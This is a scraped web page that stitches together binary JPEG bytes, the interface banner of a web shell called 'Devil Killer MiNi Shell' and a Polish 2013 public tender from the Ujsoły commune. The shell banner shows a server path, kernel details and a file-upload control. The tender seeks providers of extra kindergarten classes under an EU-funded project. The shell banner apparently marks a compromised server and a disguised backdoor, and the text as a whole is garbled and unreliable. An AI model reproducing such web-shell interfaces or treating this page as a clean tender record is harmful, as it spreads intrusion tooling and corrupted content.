JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130926/197455-N-2013.html

<p class="kh_header"><b>Ujsoły: Prowadzenia zajęć dodatkowych w Przedszkolu w Ujsołach w ramach Projektu 
Równy start od przedszkola współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 197455 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ujsoły , ul. Gminna 1, 34-371 Ujsoły, woj. śląskie, tel. 0-33 8647350, faks 0-33 8647354.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujsoly.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenia zajęć dodatkowych w Przedszkolu w Ujsołach w ramach Projektu 
Równy start od przedszkola współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące organizację i prowadzenie zajęć dodatkowych w Przedszkolu w Ujsołach.
Zakres zamówienia: Prowadzenie zajęć dodatkowych dla dzieci od 3 do 6 lat w ramach Projektu pn. Równy stary od przedszkola, zwanego w dalszej części SIWZ Projektem, realizowanego przez Gminę Ujsoły na  podstawie umowy o dofinansowanie Projektu nr: UDA-POKL.09.01.01-24-020/13-00 zawartej z Urzędem Marszałkowskim Województwa  Śląskiego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach, Działanie: 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie: 9.1.1. Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej. Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Zajęcia dodatkowe prowadzone będą od poniedziałku do piątku, z wyłączeniem wakacji letnich, przerw świątecznych i dni ustawowo wolnych - dni wolne określone w Rozporządzeniu MENiS z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. Nr 46, poz. 432 z późn. zm.) poza podstawą programową od 7:00 do 8:00 oraz od 13:00 do 16:00 przez 60 tygodni w grupach od 10 do 15 osobowych w Przedszkolu w Ujsołach oraz salach udostępnionych przez Zamawiającego w okresie od października 2013 r. do 30 czerwca 2015 r. 
Łączna ilość godzin do realizacji w ramach niniejszego zamówienia to 3300 godzin, w tym 440 godzin w roku 2013, 1870 godzin w 2014 oraz 990 godzin w roku 2015.
Ilość godzin do realizacji w ramach wybranej części zamówienia została określona poniżej. 
Za godzinę przyjmuje się, na potrzeby niniejszego zamówienia godzinę zegarową trwającą 60 minut. Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu.  
Wykonawca będzie odpowiedzialny:
 za przygotowanie, realizację i dokumentację zajęć dodatkowych w tym zobowiązany do:
-przygotowania realizacji i dokumentacji zajęć dodatkowych,
-świadczenia usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy tego typu usługach,
-terminowego wykonywania wszystkich czynności związanych z realizacją usługi,
-opracowania w terminie 5 dni kalendarzowych od dnia zawarcia umowy, programu i planu pracy zajęć dodatkowych, a następnie przedstawienia do akceptacji Kierownikowi Projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych, 
-poprawności przedstawianych dokumentów w tym: ewidencji czasu pracy, harmonogramów, dzienników zajęć, itp.
-monitorowania postępów Uczestników Projektu zakwalifikowanych do udziału w zajęciach - przedkładanie półrocznych sprawozdań z postępów dziecka do 10 dnia miesiąca rozpoczynającego następne półrocze,
-prowadzenia dokumentacji z prowadzonych zajęć: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych w wersji papierowej,
-raportowanie o postępie realizowanych zajęć, oraz o ewentualnych nieprawidłowościach w tym o nieobecności uczestników Projektu, 
-informowania na bieżąco o wszystkich zaistniałych problemach w realizacji  przedmiotu umowy,
-prowadzenia ewidencji czasu pracy z dokładnością do 1 godziny,
-przekazywania dokumentacji z przeprowadzonych zajęć po przepracowaniu całego miesiąca do Kierownika Projektu.
-przestrzegania obowiązków, zaleceń i terminów wynikających z realizacji umowy;
-udziału w zebraniach zwoływanych przez Kierownika Projektu;
-opieki nad dziećmi podczas zajęć;
-dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji Projektu;
-przestrzegania obowiązujących przepisów prawa i Statutu Przedszkola w Ujsołach, w którym będą prowadzone zajęcia. 

Zamawiający zobowiązuje się do:
- nieodpłatnego udostępnienia pomieszczenia na potrzeby przeprowadzenia zajęć;
- nieodpłatnego udostępnienia sprzętu i pomocy dydaktycznych, oraz materiałów niezbędnych do prowadzenia zajęć.
- zapewnienia osób odpowiedzialnych za: rekrutację uczestników, zarządzanie administracyjno - finansowe Projektu, przygotowanie wzoru dokumentów (kart czasu pracy, list obecności, ankiet monitorujących itp.),
Szczegółowy harmonogram realizacji zajęć zostanie ustalony z Wykonawcą w terminie do 5 dni od dnia podpisania umowy na spotkaniu organizacyjnym w porozumieniu z Zamawiającym.
 Zamówienie zostało podzielone na 9 części
CZĘŚĆ Nr: 1 NAZWA: Zajęcia dodatkowe z rytmiki prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 2 NAZWA: Zajęcia dodatkowe Spotkanie z książeczką i bajeczką prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 3 NAZWA: Zajęcia dodatkowe plastyczno - techniczne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 4 NAZWA: Zajęcia dodatkowe Kółko regionalne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 5 NAZWA: Zajęcia dodatkowe teatralne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 6 NAZWA: Zajęcia dodatkowe ruchowo - sportowe prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 7 NAZWA: Zajęcia dodatkowe ekologiczne Mały przyrodnik prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr:  8 NAZWA: Zajęcia dodatkowe Europejczyk to ja prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach.
CZĘŚĆ Nr: 9 NAZWA: Zajęcia korekcyjno - kompensacyjne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie w trybie art. 22 ust. 1 ustawy prawo zamówień publicznych -według propozycji stanowiącej załącznik nr 3 do SIWZ. 
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie metodą spełnia - nie spełnia w oparciu o złożone przez wykonawcę oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie w trybie art. 22 ust. 1 ustawy prawo zamówień publicznych -według propozycji stanowiącej załącznik nr 3 do SIWZ. 
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie metodą spełnia - nie spełnia w oparciu o złożone przez wykonawcę oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potencjału technicznego - zamawiający nie stawia warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia, wykształcenia, kwalifikacji zawodowych niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - można wykorzystać załącznik nr 4.
oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (kwalifikacje zawodowe), jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - można wykorzystać załącznik nr 5.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie metodą spełnia - nie spełnia w oparciu o złożone przez wykonawcę oświadczenie i wykaz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie w trybie art. 22 ust. 1 ustawy prawo zamówień publicznych -według propozycji stanowiącej załącznik nr 3 do SIWZ. 
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie metodą spełnia - nie spełnia w oparciu o złożone przez wykonawcę oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy  
oświadczenie o związaniu z ofertą</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności i mogą nastąpić w następujących przypadkach:
a) zaprzestania finansowania Projektu na skutek rozwiązania umowy pomiędzy Gminą Ujsoły, a Instytucją Pośredniczącą tj. Urzędem Marszałkowskim Województwa Śląskiego,
b) zmiany nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych, 
c) zmiany harmonogramu realizacji Projektu w przypadku zaistnienia zmian wytycznych, zmian warunków realizacji Projektu lub treści dokumentów programowych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ujsoly.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ujsoły
ul. Gminna 1
34-371 Ujsoły
pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 09:00, miejsce: Urząd Gminy Ujsoły
ul. Gminna 1
34-371 Ujsoły
pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Priorytet IX Rozwój wykształcenia i kompetencji w regionach. Działanie 9.1 - wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej. Program Operacyjny Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dodatkowe z rytmiki prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych z rytmiki dla dzieci w wieku od 3 do 6 lat w 10 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 600 (60 tygodni x 10 grup x 1 godzina) w tym: 80 godzin w 2013 r, 340 godzin w 2014 r, 180 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dodatkowe Spotkanie z książeczką i bajeczką prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych Spotkanie z książeczką i bajeczką dla dzieci w wieku od 3 do 6 lat w 10 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 10 grup x 0,5 godziny) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 30 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia dodatkowe plastyczno - techniczne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych plastyczno - technicznych dla dzieci w wieku od 3 do 6 lat w 10 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 600 (60 tygodni x 10 grup x 1 godzina) w tym: 80 godzin w 2013 r., 340 godzin w 2014 r., 180 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dodatkowe Kółko regionalne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych Kółko regionalne dla dzieci w wieku od 3 do 6 lat w 5 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 5 grup x 1 godzina) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia dodatkowe teatralne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych teatralnych dla dzieci w wieku od 3 do 6 lat w 5 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 5 grup x 1 godzina) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia dodatkowe ruchowo - sportowe prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych ruchowo - sportowych dla dzieci w wieku od 3 do 6 lat w 10 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 600 (60 tygodni x 10 grup x 1 godzina) w tym: 80 godzin w 2013 r., 340 godzin w 2014 r., 180 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
